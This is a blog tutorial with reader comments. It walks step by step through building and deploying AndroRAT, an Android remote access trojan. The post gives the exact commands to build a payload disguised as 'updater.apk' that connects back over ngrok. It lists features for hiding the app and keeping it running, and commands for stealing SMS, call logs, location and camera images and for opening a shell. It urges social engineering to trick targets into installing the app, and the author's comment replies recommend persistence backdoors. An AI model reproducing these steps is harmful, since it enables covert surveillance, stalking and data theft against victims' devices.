This blog is NOT OFFICIAL website of Kali Linux. We just share Tutorials to learn Cybersecurity.

How to Remotely Monitor any Android Device

Android is the most popular mobile operating system in today's world. In today's article we are going to learn "how to monitor an Android device remotely ?" To do so we are going to use a malicious application using our Kali Linux.

Using this method parents can monitor their kids mobile devices, a company can monitor what employees doing on company provided devices. Basically, we can use this to monitor any Android device.

remotly monitor android devices

To do so we are going to use AndroRAT. The name says all about this, Andro for Android and RAT is Remote Access Tool/Trojan. AndroRAT is designed to give control of the Android system remotely and receive information from it. It is a client/server application developed in Java Android for the client side and the server side is written in Python.

AndroRAT will work on devices from Android 4.1 (Jellybean) to Android 9 (Oreo) (API 16 to API 28). This RAT also works on Android 10, but some of the interpreter commands will be unstable.

Features of AndroRAT

  • Full persistence backdoor.
  • Invisible icon after installation.
  • Lightweight apk runs 24X7 in background.
  • Uses very minimal resources, so can't be suspected.
  • Automatic start after reboot.
  • Audio and take pictures from both camera.
  • Browse call and SMS log.
  • Get current location, SIM card details, IP, MAC address of the device.

Installing & Using AndroRAT on Kali Linux

First of all we need to install Python3 on our Kali Linux system. We can do it by using following command:

sudo apt install python3 python3-pip

In the following screenshot we can see the output of the above command:

installing python3 on kali

Now we need to install and set up Java 8 (OpenJDK 8) on our system. We have shown this on a previous article.

Now we need to clone AndroRAT on our system from GitHub by using following command:

git clone https://github.com/karma9874/AndroRAT

We can see the result on the following screenshot:

cloning AndroRAT from GitHub

Now we need to move to the AndroRAT directory by using cd command:

cd AndroRAT

Then we need to install all the requirements for AndroRAT by using following command:

pip3 install -r requirements.txt
installing requirements androrat

In the above screenshot we can see the installation process of requirements. After that we need to install ngrok and set ngrok authentication token on our system, we had set it on our previous article. We need to follow that article to set ngrok on our system.

Now we can build the malicious APK file (payload), to do so we need to run following command:

python3 androRAT.py --build --ngrok -p 8888 -o ~/Desktop/updater.apk

In the above command we can see that we had used the androRAT.py python script and build our payload using --build flag, then we use --ngrok option because we had set up ngrok on our system (it will be easier otherwise we can use our IP address with -i flag, using ngrok we can easily start the listener). If we want then we can set an icon for the app using --icon flag following by an icon file path on our system but this payload runs on background so we are skipping this. Then we set a port for this service then we set the output file name using -o flag. The following screenshot shows the output of the above command:

building payload using androrat

In the above screenshot we can see that AndroRAT is building and signing the apk file, also we can see the output file (updater.apk) is on our Desktop. After finishing the the building process it will start the listener automatically as we can see in the following screenshot:

androrat listner

In the above screenshot we can see that AndroRAT listener is started and waiting for connection. Now we can send our apk file to a Android device by social engineering techniques and convince our target user to install it. To show a demo we are going to install the payload on our own Android tablet. We can see that we got the connection in the following screenshot:

got connected with android device using androrat
Here we can run various commands. To check the commands list given below:

  • deviceInfo                  --> returns basic info of the device
  • camList                    --> returns cameraID  
  • takepic [cameraID]           --> Takes picture from camera
  • startVideo [cameraID]        --> starts recording the video
  • stopVideo                  --> stop recording the video & show video file
  • startAudio                 --> starts recording the audio
  • stopAudio                  --> stop recording the audio
  • getSMS [inbox|sent]          --> returns inbox sms or sent sms in a file 
  • getCallLogs                --> returns call logs in a file
  • shell                      --> starts a sh shell of the device
  • vibrate [number_of_times]    --> vibrate the device number of time
  • getLocation                --> return the current location of the device
  • getIP                     --> returns the ip of the device
  • getSimDetails              --> returns the details of all sim of the device
  • clear                     --> clears the screen
  • getClipData                 --> show the current text on the clipboard
  • getMACAddress            --> returns the mac address of the device
  • exit                       --> exit the interpreter

We can run the above commands to monitor the android device. For an example we run the getSMS inbox command to see the inbox of our target. The output shown in the following screenshot:

getting sms list of an android device
In the above screenshot we can see that the SMS of victim's inbox saved on our highlighted directory.

Same way if we want to take a camera shot we need to run the camList command first then it will show the list of camera's on that device. Then we can take a snap by using takepic <number of camera> command. Shown in the following screenshot:

taking pic from back camera

We also can open the shell-prompt of target android device by using shell command. After getting the terminal of the target of the victim's device we can control the device from our Kali Linux system.

Some Extra Talks

  1. We have used ngrok services, but ngrok services are not so much stable. If we need a stable connection we need to use our static public IP address and forward our using port.
  2. If the targeted device have battery saver mode on then our payload will not get reverse connection.
  3. If our target device have Android version 11 or above then some interpreter commands may not stable.
  4. We need some great social engineering techniques to make fool our target and install the payload and after installing must need to click on "Open". After that the payload will be hidden.

Warning:- This article is written for experimental and educational purposes only. We tried this on our own devices to show the demonstrate. Hacking other's devices without proper permissions is illegal and can be considered as criminal offense. We are not responsible if anyone did anything wrong. Do the things at your own risk.

This is how we can remotely control or monitor Android devices from our Kali Linux system. This method is shown for educational purposes, it also spread cybersecurity awareness that how they hack into our systems.

Love our articles? Make sure to follow us to get all our articles directly on notification. We are also available on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

author-img
Kali Linux

Comments

13 comments
Post a Comment
  • AnonymousMay 4, 2022 at 5:17 PM

    How can I reconnect with that device after closing terminal ???

    Delete Comment
    • Kali Linux photo
      Kali LinuxMay 4, 2022 at 7:21 PM

      We suggest to make a persistence backdoor on the target Android device just after first connection. There are lots of articles on the internet to make this. Warning:- Please do such things on your own device. We don't support any illegal works.

      Delete Comment
    • AnonymousMay 11, 2022 at 8:42 PM

      [ERROR] pyngrok not found
      How to solve this

      Delete Comment
      • AnonymousMay 11, 2022 at 8:46 PM

        python3 androRAT.py --build --ngrok -p 8888 -o ~/Desktop/updater.apk
        [ERROR] pyngrok not found
        [INFO] Run pip3 install -r requirements.txt
        this error shows up
        how to solve this

        Delete Comment
        • Kali Linux photo
          Kali LinuxMay 12, 2022 at 8:12 AM

          You shows us the solution. You need to run command "pip3 install -r requirements.txt"... If you already did this then run command "pip3 install pyngrok"

          Delete Comment
          • AnonymousMay 12, 2022 at 10:43 AM

            "python3 androRAT.py --build --ngrok -p 8888 -o ~/Desktop/updater.apk"
            Still now working I whenever I put this above command It shows
            [ERROR] pyngrok not found
            and I also tried using this command "pip3 install pyngrok"
            It shows this
            "Requirement already satisfied: pyngrok in /usr/local/lib/python3.10/dist-packages (5.1.0)
            Requirement already satisfied: PyYAML in /usr/lib/python3/dist-packages (from pyngrok) (5.4.1)
            WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv "

            please guide me full solution

            Delete Comment
            • Kali Linux photo
              Kali LinuxMay 12, 2022 at 6:18 PM

              try "pip install pyngrok"... Then let us know again.

              Delete Comment
            • AnonymousSeptember 1, 2022 at 8:55 AM

              not working

              Delete Comment
            • AnonymousSeptember 7, 2022 at 12:20 AM

              Traceback (most recent call last):
              File "/home/kali/seeker/seeker.py", line 339, in
              clear()
              File "/home/kali/seeker/seeker.py", line 319, in clear
              with open(RESULT, 'w+'):
              PermissionError: [Errno 13] Permission denied: '/home/kali/seeker/logs/result.txt'

              Delete Comment
              • Kali Linux photo
                Kali LinuxSeptember 7, 2022 at 10:11 PM

                read the install log file and check why requests and packaging failed to install

                Delete Comment
              • AnonymousSeptember 7, 2022 at 12:22 AM

                python3 seeker.py when i use this command i see the error plz check and find my solution

                Delete Comment
                • AnonymousSeptember 13, 2022 at 11:02 AM

                  how to get back to the interpreter after exiting from it.
                  while running this command again "python3 androRAT.py --shell -i 0.0.0.0 -p 4444"
                  Its showing this error "[Errno 98] Address already in use"

                  So how can we get back to the same device interpreter.

                  Delete Comment
                  google-playkhamsatmostaqltradent